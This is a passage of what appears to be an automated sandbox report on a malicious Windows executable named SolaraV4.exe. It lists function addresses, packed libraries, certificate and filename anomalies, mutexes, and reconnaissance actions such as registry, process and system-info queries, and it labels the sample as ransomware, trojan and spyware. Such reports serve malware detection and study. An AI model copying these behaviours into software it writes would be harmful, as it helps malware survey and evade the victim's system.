Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64F39 3_2_00007FFE75E64F39
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE76017980 3_2_00007FFE76017980
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75FFFA10 3_2_00007FFE75FFFA10
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61A4B 3_2_00007FFE75E61A4B
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F92670 3_2_00007FFE75F92670
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E6655A 3_2_00007FFE75E6655A
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64679 3_2_00007FFE75E64679
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E66FF5 3_2_00007FFE75E66FF5
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E65E20 3_2_00007FFE75E65E20
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE76016290 3_2_00007FFE76016290
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61B31 3_2_00007FFE75E61B31
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61424 3_2_00007FFE75E61424
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E61622 3_2_00007FFE75E61622
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E63693 3_2_00007FFE75E63693
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64C32 3_2_00007FFE75E64C32
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75F42E70 3_2_00007FFE75F42E70
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FFE75E64CFF 3_2_00007FFE75E64CFF
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E1884 108_2_00007FF7C71E1884
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EB540 108_2_00007FF7C71EB540
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F54C0 108_2_00007FF7C71F54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E82F0 108_2_00007FF7C71E82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F1180 108_2_00007FF7C71F1180
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720AE10 108_2_00007FF7C720AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7217B24 108_2_00007FF7C7217B24
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EABA0 108_2_00007FF7C71EABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F0A2C 108_2_00007FF7C71F0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E8884 108_2_00007FF7C71E8884
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F2890 108_2_00007FF7C71F2890
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72318A8 108_2_00007FF7C72318A8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722190C 108_2_00007FF7C722190C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210904 108_2_00007FF7C7210904
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72138E8 108_2_00007FF7C72138E8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F17C8 108_2_00007FF7C71F17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72067E0 108_2_00007FF7C72067E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7237660 108_2_00007FF7C7237660
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F86C4 108_2_00007FF7C71F86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72486D4 108_2_00007FF7C72486D4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721A710 108_2_00007FF7C721A710
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7220710 108_2_00007FF7C7220710
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7222700 108_2_00007FF7C7222700
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720F5B0 108_2_00007FF7C720F5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8598 108_2_00007FF7C71F8598
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721F59C 108_2_00007FF7C721F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723260C 108_2_00007FF7C723260C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72165FC 108_2_00007FF7C72165FC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225468 108_2_00007FF7C7225468
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720D458 108_2_00007FF7C720D458
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EA504 108_2_00007FF7C71EA504
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723832C 108_2_00007FF7C723832C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F2360 108_2_00007FF7C71F2360
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210374 108_2_00007FF7C7210374
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720C3E0 108_2_00007FF7C720C3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7207244 108_2_00007FF7C7207244
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EF24C 108_2_00007FF7C71EF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C 108_2_00007FF7C71FE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7232268 108_2_00007FF7C7232268
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FD2C0 108_2_00007FF7C71FD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72202A4 108_2_00007FF7C72202A4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7231314 108_2_00007FF7C7231314
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E42E0 108_2_00007FF7C71E42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7222164 108_2_00007FF7C7222164
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72441CC 108_2_00007FF7C72441CC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72281CC 108_2_00007FF7C72281CC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7218040 108_2_00007FF7C7218040
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F3030 108_2_00007FF7C71F3030
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210074 108_2_00007FF7C7210074
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720C05C 108_2_00007FF7C720C05C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7200104 108_2_00007FF7C7200104
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72400F0 108_2_00007FF7C72400F0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7215F4C 108_2_00007FF7C7215F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724AF90 108_2_00007FF7C724AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721C00C 108_2_00007FF7C721C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7224FE8 108_2_00007FF7C7224FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724DFD8 108_2_00007FF7C724DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722AE50 108_2_00007FF7C722AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71ECE84 108_2_00007FF7C71ECE84
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C723FE74 108_2_00007FF7C723FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8E68 108_2_00007FF7C71F8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722EEA4 108_2_00007FF7C722EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721AF0C 108_2_00007FF7C721AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E9EFC 108_2_00007FF7C71E9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7210D20 108_2_00007FF7C7210D20
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7229D74 108_2_00007FF7C7229D74
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7231DCC 108_2_00007FF7C7231DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F1E04 108_2_00007FF7C71F1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EEE08 108_2_00007FF7C71EEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71F8C30 108_2_00007FF7C71F8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225C8C 108_2_00007FF7C7225C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71EDD04 108_2_00007FF7C71EDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7209D0C 108_2_00007FF7C7209D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7236D0C 108_2_00007FF7C7236D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7224B38 108_2_00007FF7C7224B38
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7239B98 108_2_00007FF7C7239B98
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721FA6C 108_2_00007FF7C721FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7225A70 108_2_00007FF7C7225A70
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C724AAC0 108_2_00007FF7C724AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71ECB14 108_2_00007FF7C71ECB14
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C721D91C 108_2_00007FF7C721D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C720D97C 108_2_00007FF7C720D97C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71E49B8 108_2_00007FF7C71E49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72269FD 108_2_00007FF7C72269FD
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: String function: 00007FF7C71F8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: String function: 00007FF7C72249F4 appears 53 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E0D3CF appears 216 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E62A04 appears 120 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E61EF1 appears 614 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FF6FFC52710 appears 104 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E64052 appears 305 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E0D465 appears 103 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E64836 appears 51 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FF6FFC52910 appears 34 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75DA12EE appears 573 times
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: String function: 00007FFE75E62734 appears 209 times
PE / OLE file has an invalid certificate
Source: SolaraV4.exe Static PE information: invalid certificate
PE file contains executable resources (Code or Archives)
Source: rar.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Sample file is different than original file name gathered from version info
Source: SolaraV4.exe Binary or memory string: OriginalFilename vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466730148.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2471274784.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466343863.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000002.2996027741.00007FF6FFC94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegprslt.exej% vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467434110.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466572649.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467003628.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467298959.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466913159.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2470903266.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2469813104.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467201489.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2466480654.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2467109257.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000001.00000003.2471041424.000002125C3B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV4.exe
Source: SolaraV4.exe Binary or memory string: OriginalFilename vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990251691.00007FFE90B7D000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990731203.00007FFE94ACC000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990992127.00007FFE957E7000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000000.2472454481.00007FF6FFC94000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegprslt.exej% vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989641836.00007FFE904FB000.00000004.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2986752957.00007FFE761B3000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989939238.00007FFE905B3000.00000004.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2981323193.00007FFE75D97000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2983884533.00007FFE75E51000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibsslH vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2990498901.00007FFE94458000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988956021.00007FFE8FF74000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988233337.00007FFE7865A000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2987777433.00007FFE7663C000.00000004.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenamepython310.dll. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2991317394.00007FFE99DBC000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2988613549.00007FFE8F41D000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs SolaraV4.exe
Source: SolaraV4.exe, 00000003.00000002.2989294446.00007FFE8FF98000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SolaraV4.exe
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Very long command line found
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: Commandline size = 3647 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: libcrypto-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.998725
Source: libssl-1_1.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9921420784883721
Source: python310.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9989874988941967
Source: sqlite3.dll.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.99755859375
Source: unicodedata.pyd.1.dr Static PE information: Section: UPX1 ZLIB complexity 0.9942085908882784
Source: classification engine Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@207/68@4/3
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FCAFC GetLastError,FormatMessageW, 108_2_00007FF7C71FCAFC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 108_2_00007FF7C722B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 108_2_00007FF7C71FEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C7203144 GetDiskFreeSpaceExW, 108_2_00007FF7C7203144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\SIHClient.exe Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
Source: C:\Users\user\Desktop\SolaraV4.exe Mutant created: \Sessions\1\BaseNamedObjects\Z
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122 Jump to behavior
Source: SolaraV4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
